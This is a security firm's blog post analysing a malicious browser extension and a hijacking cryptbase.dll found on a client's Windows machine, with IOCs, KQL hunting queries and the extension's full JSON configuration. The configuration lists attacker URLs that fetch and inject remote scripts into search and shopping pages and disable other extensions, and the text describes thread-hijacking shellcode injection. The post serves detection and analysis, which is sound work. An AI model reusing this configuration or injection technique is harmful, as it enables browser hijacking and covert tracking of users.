Analysing a latent malware infection on a recently MDE-onboarded machine (Part 2)

Cyber security White Hat todaySeptember 13, 2023 131

Background
share close

Recently, an interesting latent malware infection was found on a newly onboarded machine at one of our clients (Client). Microsoft Defender for Endpoint (MDE) reported anomalies about the computer shortly after onboarding, but uncovering the inner workings of the malware and the infection methods required thorough investigation We present the second part of the investigation in this article with the Client’s approval.

(For the Part 1 see our previous post: https://whitehat.eu/analysing-a-latent-malware-infection-on-a-recently-mde-onboarded-machine/)

Malware analysis

The browser extension

Continuing on, we loaded the extension standalone into a clean browser inside a virtual machine (VM) to inspect the related network connections and communication. For the investigation, the VM internet connection was proxied over Burp Proxy.

The extension was loaded into a fresh, up-to-date Edge browser. After the initial loading, the extension showed the attributes of small size, clean icon, and empty name:

malware infection analysis

The extension in the toolbar gave nothing as depicted below:

malware infection analysis

After the installation of the extension, the malware started communicating with the “de.withtls[.]net” domain to register itself and obtained the configuration in JSON structure (see Appendix 1).

For example, in this JSON, there are various advertising-related German domain entries to keep track of:

malware infection analysis

The extension can inject arbitrary externally hosted JS file as well into any visited webpage:

malware infection analysis

Another aspect of the extension is that it is proxying any search term over the malicious actor infrastructure. Here the tested search term was “How to download more RAM” in Google, and a response communication came back with a yahoo search term:

malware infection analysis
malware infection analysis

Furthermore, the extension has a Google-Analytics identifier, giving the ability to the attacker to further track the victim trough the visited sites, in addition it injects standard Google trackers into any page that the user opens to keep the tracking ability up.

malware infection analysis

Reverse engineering the hijacker dll

Since we used Edge browser in our lab environment, the malware installed the fake cryptbase.dll at the following path:

C:\Program Files (x86)\Microsoft\Edge\Application\cryptbase.dll.

malware infection analysis

The static analysis presented the main functionalities and apparent goals of the executable, leading us to look after any thread injection, as it manipulates memory page protection to change it to a Read-Write-Execute and suspend – inject – resume thread:

malware infection analysis

We loaded the sample in disassembler to follow the execution flow. At first, it loaded the legitimate cryptbase.dll from the System32 folder.

malware infection analysis

The target thread is specified in the code that will be injected. In our case, it was the so-called NetGetJoinInformation’s thread, in which the shellcode has been injected.

malware infection analysis

After that, it enumerates the threads in the snapshot created by CreateToolhelp32Snapshot API, injects its shellcode and changes the protection of the targeted memory page to RWX.

malware infection analysis

Here is the thread injection itself in the code. At the middle, it updates the target thread’s instruction pointer (RIP register) to point to the shellcode, which was written into the target process’ memory:

malware infection analysis

Regarding this thread injection technique, we highly recommend the following article which gives information from the perspective of red teams in detail:

https://www.ired.team/offensive-security/code-injection-process-injection/injecting-to-remote-process-via-thread-hijacking

Indicators of compromise

Domains:

  • de.mynodejs[.]net
  • updatepush[.]com
  • de.withtls[.]net (browser extension)
  • g.httpsweb[.]com (browser extension)
  • jspixel[.]com (browser extension)
  • clinedafi[.]net (browser extension)

Files, packages:

  • Vulnerable official Node.js end-of-life version in default location: node-v6.10.3-x86.msi
    SHA256:d4000be1329737bd2f4c2e54abc939ca249c11cbcc8898240fece37cb74cf09f
  • Themida packed cpython exe component. SHA256:
    f87ed053f4d26ad33aee5e574087aedaa65d932854b7cb065893e1c0fa5db3d5
  • Proxy-dlls in browser’s folder:
    • C:\Program Files (x86)\Microsoft\Edge\Application\cryptbase.dll
    • C:\Program Files (x86)\Google\Chrome\Application\version.dll
Appendix 1 – Browser extension JSON configuration
{
    "xconfig": {
        "livejs": {
            "active": true,
            "goNuclear": false,
            "useTheForce": true
        },
        "redir": {
            "active": true,
            "unblockAfter": 600000
        },
        "hiddenWindow": {
            "windowCloseTimeout": 600000,
            "openAlways": true
        },
        "gTracker": {
            "active": false,
            "url": "https://data.ad-count.com/g/"
        },
        "urlCollector": {
            "active": false,
            "url": "https://data.ad-count.com/url/",
            "blacklist": []
        },
        "chainTracker": {
            "active": false,
            "url": "https://data.ad-count.com/ct/"
        },
        "unblockAll": {
            "active": true,
            "matchWWW": true,
            "domains": [
                "kostenlos.de",
                "gutscheine.biz",
                "gutscheinlager.de",
                "sale-forever.de",
                "shopping-rabatt.de",
                "couponster.de",
                "sparwelt.de",
                "gutscheinagent.de",
                "gutscheinbox.de",
                "gutscheingirl.de",
                "gutscheintabelle.de",
                "derbestegutschein.de",
                "gutscheine.de",
                "gutschein.de",
                "gutscheinpony.de",
                "gutscheine.com",
                "gutscheincodes.de",
                "coupons4u.de",
                "gutscheinsammler.de",
                "mydealz.de",
                "gutscheine-oase.de"
            ]
        },
        "derailer": {
            "domainRedirects": [
                [
                    "www.searchfolder.net/1",
                    "https://www.searchfolder.net/1?url={URL}"
                ],
                [
                    "laserveradedomaina.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "workupgrade.thebestcontentsafesitealways.stream",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "target.ok.de",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "letsupdateourdomain.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "www.onclickmax.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "syndication.exdynsrv.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "ladomainadeserver.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "onclkds.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "www.greatdexchange.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "go.oclasrv.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ]
            ]
        },
        "telemetry": {
            "active": true,
            "account": "UA-10XXXXXX5-10",
            "url": "https://www.jspixel.com/p/",
            "headers": [
                [
                    "X-AnalPixel",
                    "1.0"
                ]
            ]
        },
        "extmgr": {
            "active": true,
            "reportURL": "https://de.withtls.net/ext?{std}",
            "delaySet": 30,
            "tempTimeout": 15,
            "mode": "temp",
            "actions": {
                "pdffkfellgipmhklpdmokmckkkfcopbh": {
                    "enable": false
                },
                "bgnkhhnnamicmpeenaelnjfhikgbkllg": {
                    "enable": false
                },
                "odfafepnkmbhccpbejgmiehpchacaeak": {
                    "enable": false
                },
                "cjpalhdlnbpafiamejdnhcphjbkeiagm": {
                    "enable": false
                },
                "gighmmpiobklfepjocnamgkkbiglidom": {
                    "enable": false
                },
                "ndcileolkflehcjpmjnfbnaibdcgglog": {
                    "enable": false
                },
                "gmgoamodcdcjnbaobigkjelfplakmdhh": {
                    "enable": false
                },
                "cfhdojbkjhnklbpkdaibdccddilifddb": {
                    "enable": false
                }
            }
        },
        "jsRunner": {
            "active": true,
            "defaults": null,
            "matchRules": [
                {
                    "selectors": [
                        [
                            "matches",
                            "*"
                        ]
                    ],
                    "htmlScripts": [
                        "https://de.withtls.net/data/runner/ga.html?{std}"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.google.*"
                        ],
                        [
                            "matchesPath",
                            "/search"
                        ]
                    ],
                    "htmlScripts": [
                        "https://de.withtls.net/data/runner/gas.html?{std}"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.bing.*"
                        ],
                        [
                            "matchesPath",
                            "/search"
                        ]
                    ],
                    "htmlScripts": [
                        "https://de.withtls.net/data/runner/bing.html?{std}"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.google.*"
                        ],
                        [
                            "matchesPath",
                            "/search"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/pst.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "any",
                            [
                                [
                                    "matches",
                                    "*://anonym.de"
                                ],
                                [
                                    "matches",
                                    "*://www.yadore.com"
                                ],
                                [
                                    "matches",
                                    "*://yadex.com"
                                ]
                            ]
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/u/d?{std}"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.amazon.*"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/asin.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.ebay.de"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/eb_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "any",
                            [
                                [
                                    "matches",
                                    "*://www.google.*"
                                ]
                            ],
                            [
                                "matchesPath",
                                "/search"
                            ]
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/gg_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.amazon.de"
                        ],
                        [
                            "matchesPath",
                            "/s"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/az_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "any",
                            [
                                [
                                    "matches",
                                    "*://bing.com"
                                ],
                                [
                                    "matches",
                                    "*://www.bing.com"
                                ]
                            ],
                            [
                                "matchesPath",
                                "/search*"
                            ]
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/bg_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "any",
                            [
                                [
                                    "matches",
                                    "*://*.search.yahoo.com"
                                ],
                                [
                                    "matches",
                                    "*://search.yahoo.com"
                                ]
                            ],
                            [
                                "matchesPath",
                                "/search*"
                            ]
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/yo_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://*.kelkoogroup.net"
                        ],
                        [
                            "matchesPath",
                            "/go"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/kk_check.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                }
            ]
        },
        "backgroundPage": {
            "active": false,
            "url": "http://bg.jspixel.com/backgroundPage2.html?{std}"
        },
        "notifier": {
            "domainNotifications": [
                [
                    [
                        "premiumsearchtech.com/c.php*"
                    ],
                    "https://data.ad-count.com/notifier/?{std}"
                ]
            ]
        }
    },
    "domains": {
        "id": "merge#1686890254.2937276",
        "url": "https://de.withtls.net/data/domain/merge.dat?iid=CC05XXXX-XXXX-XXXX-XX85-BD5D5C36E266&v=4.28&ver=2.4.11&tp=e&ts=1686920420&dlid=merge"
    },
    "livejs": {
        "id": "gtm_1.0#1593605330.978869",
        "url": "https://de.withtls.net/get?iid=CC05XXXX-XXXX-XXXX-XX85-BD5D5C36E266&v=4.28&ver=2.4.11&tp=e&ts=1686920420&ljsid=gtm_1.0"
    }
}
Appendix 2 – KQL Series
DeviceNetworkEvents
| where RemoteUrl contains "withtls.net"

DeviceProcessEvents
| where InitiatingProcessSHA256 contains "518ea2f7e77780ad2eaeadaa818c8d45ac480a62d8b503f88e25412572ebce49"
| summarize count() by DeviceName

DeviceRegistryEvents
| where RegistryKey contains @"SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"
| where RegistryValueName == "SpyNetReporting"
| where RegistryValueData contains "0"

DeviceRegistryEvents
| where RegistryKey contains @"SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"
| where RegistryValueName == "SubmitSamplesConsent"
//| where RegistryValueData contains "2"

DeviceRegistryEvents
| where RegistryKey contains @"SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Path"
| where RegistryValueName == @"C:\"

Written by: White Hat

Tagged as: , .

Rate it
Previous post

Similar posts